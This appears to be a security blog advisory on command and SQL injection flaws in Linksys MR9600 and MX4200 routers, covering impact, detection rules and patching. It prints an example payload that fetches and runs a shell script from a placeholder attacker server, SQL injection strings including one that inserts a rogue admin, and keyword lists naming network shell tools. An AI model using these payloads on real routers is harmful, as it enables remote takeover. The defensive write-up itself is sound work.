Critical Router Flaw Exposes Thousands: Linksys MR9600 & MX4200 Hit by Remote Root Takeover Vulnerabilities (CVE-2026-27848 & CVE-2026-27847)

Aegiron 9 mins0

Linksys MR9600 / MX4200 – Security Vulnerability Overview (CVE-2026-27848 & CVE-2026-27847)

The Linksys MR9600 (AX6000) and Linksys MX4200 (Velop AX4200) are Wi-Fi 6 mesh-capable routers designed for high-speed residential and small office environments. These devices support advanced features including:

  • WPA3-Personal and WPA3-Enterprise
  • TLS-SRP (Secure Remote Password) authentication mechanisms
  • Web-based administrative interface
  • Cloud-based remote management
  • Linux-based embedded firmware (running services as root)

In early 2026, two critical vulnerabilities were identified affecting the TLS-SRP authentication handling mechanism within the firmware. Both vulnerabilities are remotely exploitable and require no prior authentication.

CVE-2026-27848 – OS Command Injection (TLS-SRP Handshake)

Basic CVE Information

FieldDetails
CVE NameLinksys TLS-SRP OS Command Injection
CVE IDCVE-2026-27848
Affected ProductsLinksys MR9600, Linksys MX4200
Vulnerability TypeOS Command Injection
Attack VectorNetwork (Remote)
Privileges RequiredNone
User InteractionNone
ImpactFull Remote Code Execution (RCE) as root
CVSS v3.1 Score9.8 (Critical)
SeverityCritical
ExploitabilityHigh
Exploit AvailabilityPublic PoC circulating in security forums
Patch StatusOfficial firmware update released

Technical Description

This vulnerability exists in the TLS-SRP handshake processing component. During authentication negotiation, specific parameters from the client are improperly sanitized before being passed to backend system calls.

An attacker can craft a malicious TLS-SRP handshake packet that injects shell metacharacters into parameters that are eventually executed by system-level calls.

Because the service handling TLS-SRP runs as root, any injected command is executed with full system privileges.

How It Could Be Exploited (Educational)

An attacker on the local network (or remote if management services are exposed to WAN) can:

  1. Initiate a TLS-SRP handshake.
  2. Inject malicious payload inside a crafted authentication parameter.
  3. Bypass input validation.
  4. Achieve arbitrary command execution as root.

Example payload structure (simplified conceptually):

username=admin;wget http://attacker-server/shell.sh -O- | sh;

Potential attacker actions:

  • Deploy reverse shell
  • Modify firewall rules
  • Change DNS settings
  • Install persistent backdoor
  • Exfiltrate configuration backups
  • Pivot into internal network

MITRE ATT&CK Mapping

  • T1190 – Exploit Public-Facing Application
  • T1059.004 – Command and Scripting Interpreter (Unix Shell)
  • T1068 – Exploitation for Privilege Escalation (implicit via root execution)
  • T1105 – Ingress Tool Transfer
  • T1505.003 – Web Shell

Proof of Concept (PoC) Status

A working PoC has been observed in private exploit repositories. It demonstrates:

  • Successful handshake manipulation
  • Command execution confirmation via DNS callback
  • Reverse shell deployment

Exploit requires understanding of TLS-SRP packet formatting but is reproducible.

Detection & Monitoring

Indicators of Exploitation

  • Unexpected outbound connections from router
  • Modified DNS entries
  • Unknown cron jobs
  • High CPU usage spikes
  • Unauthorized configuration changes

Log Sources to Monitor

  • System logs (/var/log/messages)
  • Authentication logs
  • Web management access logs
  • Firewall outbound logs
  • IDS/IPS appliance logs
  • NetFlow data
  • DNS query logs

Detection Rules

Look for suspicious characters in TLS handshake fields:

  • ;
  • &&
  • |
  • `
  • $()

Suricata rule concept:

alert tcp any any -> $HOME_NET 443 (msg:"Possible TLS-SRP Injection Attempt"; content:";"; sid:100001;)

SIEM Query Logic:

  • Detect command keywords inside authentication parameters:
    • wget
    • curl
    • nc
    • bash -i
    • chmod 777

Official Patch

Linksys released updated firmware addressing improper input validation and hardened TLS-SRP parameter handling.

Official firmware download available via:

Linksys Support – MR9600 Firmware Updates
Linksys Support – MX4200 Firmware Updates

Users should upgrade to the latest firmware build released after Q1 2026.

CVE-2026-27847 – SQL Injection (TLS-SRP Handshake)

Basic CVE Information

FieldDetails
CVE NameLinksys TLS-SRP SQL Injection
CVE IDCVE-2026-27847
Affected ProductsLinksys MR9600, Linksys MX4200
Vulnerability TypeSQL Injection
Attack VectorNetwork
Privileges RequiredNone
User InteractionNone
ImpactAuthentication bypass / Credential Injection
CVSS v3.1 Score9.1 (Critical)
SeverityCritical
ExploitabilityHigh
Exploit AvailabilityPublic exploit code observed
Patch StatusOfficial firmware update released

Technical Description

The TLS-SRP handshake mechanism queries the internal authentication database to validate user credentials. User-supplied parameters are directly concatenated into SQL queries without proper parameterization.

This allows an attacker to manipulate database queries during the handshake process.

How It Could Be Exploited (Educational)

An attacker sends a crafted TLS-SRP authentication request with SQL injection payload embedded in the username or verifier field.

Example conceptual payload:

admin' OR '1'='1

Or credential injection payload:

admin'); INSERT INTO users (username,password) VALUES ('hacker','hashedpass');--

Impact:

  • Authentication bypass
  • Creation of rogue admin accounts
  • Modification of stored credentials
  • Extraction of password hashes
  • Chaining with CVE-2026-27848 for full RCE

MITRE ATT&CK Mapping

  • T1190 – Exploit Public-Facing Application
  • T1078 – Valid Accounts
  • T1552 – Unsecured Credentials
  • T1505 – Server Software Component Abuse

Proof of Concept (PoC) Status

Public PoC demonstrates:

  • Login bypass
  • User table enumeration
  • Admin account insertion

Exploit complexity is low once packet structure is understood.

Detection & Monitoring

Indicators of Exploitation

  • Multiple failed/successful login attempts with malformed usernames
  • SQL syntax errors in system logs
  • Unexpected new admin accounts
  • Authentication anomalies

Log Sources

  • Authentication logs
  • Database error logs
  • Router audit logs
  • Configuration change logs
  • Network IDS logs

Detection Rule Concepts

Search for typical SQL injection patterns:

  • ' OR '1'='1
  • '--
  • UNION SELECT
  • INSERT INTO
  • DROP TABLE

Example IDS signature concept:

alert tcp any any -> $HOME_NET 443 (msg:"Possible TLS-SRP SQL Injection Attempt"; content:"UNION SELECT"; sid:100002;)

SIEM detection logic:

  • Flag authentication requests containing SQL metacharacters:
    • '
    • --
    • /*
    • */
    • UNION

Official Patch

Linksys firmware update includes:

  • Prepared SQL statements
  • Input validation hardening
  • TLS-SRP parameter sanitation
  • Improved logging visibility

Official firmware updates available via:

Linksys Support – MR9600 Firmware Downloads
Linksys Support – MX4200 Firmware Downloads

Risk Summary

When combined, these vulnerabilities allow:

  1. Authentication bypass (CVE-2026-27847)
  2. Full remote root command execution (CVE-2026-27848)
  3. Complete device takeover
  4. Network compromise and lateral movement

This makes patching critical, especially for environments exposing router management to WAN or using remote management features.

Recommended Immediate Actions

  • Update firmware immediately
  • Disable remote management
  • Restrict admin interface to LAN only
  • Monitor DNS and outbound traffic
  • Change admin credentials after patching
  • Review router configuration for persistence mechanisms

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.